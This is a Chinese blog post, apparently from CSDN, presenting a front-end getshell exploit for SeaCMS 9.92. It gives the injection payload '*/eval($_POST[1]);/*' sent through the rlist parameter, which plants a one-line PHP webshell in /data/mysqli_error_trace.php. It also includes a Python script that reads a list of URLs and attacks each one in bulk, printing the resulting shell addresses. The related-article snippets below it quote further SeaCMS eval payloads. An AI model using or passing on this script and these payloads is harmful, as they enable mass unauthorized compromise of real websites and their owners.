浅谈seacms的getshell

最新推荐文章于 2024-07-27 13:39:59 发布
最新推荐文章于 2024-07-27 13:39:59 发布
阅读量971 收藏 6
点赞数
文章标签: python php 安全漏洞 cms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/105653034
版权

最近几天一直在研究对cms的get shell,刚好看到几篇文章是关于对seacms代码审计,所以尝试写一个exp来对seacms进行getshell【seacms版本为9.92】

0x001-出现漏洞的代码

关键在于$rlist这个变量是可控的,因为下图目录在comment/api/index.php
在这里插入图片描述
在include/sql.class.php文件下有个重大漏洞,设置了一个储存报错内容的文件。
在这里插入图片描述
在这里插入图片描述

在include/filter.inc.php 文件下,将三种请求方式注册了全局变量
在这里插入图片描述

0x002-漏洞利用

构造的payload:*/eval($_POST[1]);/*
在这里插入图片描述

然后一句话木马会写进/data/mysqli_error_trace.php文件中
在这里插入图片描述

利用蚁剑或者菜刀连接成功
在这里插入图片描述

0x003-exp脚本

导入seacms的url,批量进行getshell

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=*/eval($_POST[1]);/*'

for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("getshell地址:"+url+"/data/mysqli_error_trace.php")

    except Exception as e:
        pass
Henry404s
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp前台显示逗号分割_海洋SeaCMS V6.456.55前台Getshell 分析复现
weixin_39664560的博客
11-22 494
继续转发我的csdn......文章目录海洋SeaCMS V6.45-6.55前台Getshell 分析复现6.4x 版本:下载链接环境搭建开始审计正向分析部分逆向分析部分构造payload开始复现:...
seacms前台getshell
ranuy阮的博客
06-11 1107
0x01 简介 海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。 0x02 环境搭建 使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。 http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。 安装成功后访问前台界面
SeaCMS海洋影视管理系统远程代码执行漏洞复现
最新发布
holyxp的博客
07-27 644
所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始。因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了。很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell。然后下面的随便填,就像这样子。
代码审计之seacms v6.45 前台Getshell 复现分析
weixin_30404405的博客
06-28 595
1.环境: php5.5.38+apache+seacms v6.45 seacms目录结构: │─admin //后台管理目录 │ │─coplugins //已停用目录 │ │─ebak //帝国备份王数据备份 │ │─editor //编辑器 │ │─img //后台静态文件 │ │─js //后台js文件 │ │─templets //后台模板文件 │─articl...
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
seacms最新版前台getshell
weixin_34025051的博客
06-10 172
cms版本:6.45,这是做一道ctf题目遇到的 实际上知道漏洞之后,题目并不难,记录的原因是。。。。payload一句话花了我一个小时。。 orz,不知道在干嘛,就是一直不成功! 漏洞原文 直接说题目,有了poc之后,我们试着写进去一句话 根据poc构造我们的paylaod }{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end...
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell
a173262565的博客
04-22 455
题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了...
代码审计之seacms v6.54 前台Getshell 复现分析
weixin_30872867的博客
06-30 518
1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : ""; 并且在v6.54中增加了对传...
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 512
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6067
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
良精南方网站系统拿webshell的教程
03-06
通过利用良精南方系统的漏洞,实现进入网站后台,并上传 。马,得到一个webshell的教程,讲述详细,一看就会。利用该方法,可以配合工具实现批量拿站。
dedecms最新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4207
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
Seacms6.45最新前台getshell漏洞
pygain的博客
02-20 6564
Seacms最新的版本为6.45 更新后的版本存在着一个前台getshell问题
seacms sql注入
Matthew
08-30 5777
最近在学习代码审计,审到一个注入,提交,说重复了,好尴尬啊。 源码下载:http://www.mycodes.net/47/7976.htm 在/i.php,获取ip的时候,全局的ip获取是做了正则。不知道问什么这里重新进行了一次ip的获取。<?php session_start(); require_once("include/common.php"); require_once(sea_I
各种cms getshell技巧
qq_53742230的博客
07-08 3416
常用CMS getshell技巧
seacms v9.92变量覆盖导致越权
RestoreJustice的博客
03-23 312
这里参考:https://xz.aliyun.com/t/6192和https://www.freebuf.com/articles/web/210902.html 对变量覆盖实现越权操作,来学习代码审计,文章使用的是v9.92版本。,需要在请求中同时添加对应的其他三个参数,如下图所示,请求中提交如下五个参数可以覆盖session中的seaadminid、seagroupid、以及sea_ckstr(登陆需要使用到的验证码)在披露这处变量覆盖导致越权的漏洞之前,其实官方就对这里注册变量加强了安全检查。
海洋CMS6.28命令执行漏洞
番薯道长的博客
11-11 8839
0x00 代码审计 area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数 area参数经过了检测是否是拼音之后 接下来到了 $content=$mainClassObj->parseSearchItemList($content,"area"); 因为能执行php代码一般就是eval()函数 搜索一下这个页
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 9835
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms的漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
Seacms漏洞
Grey的博客
07-10 5054
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值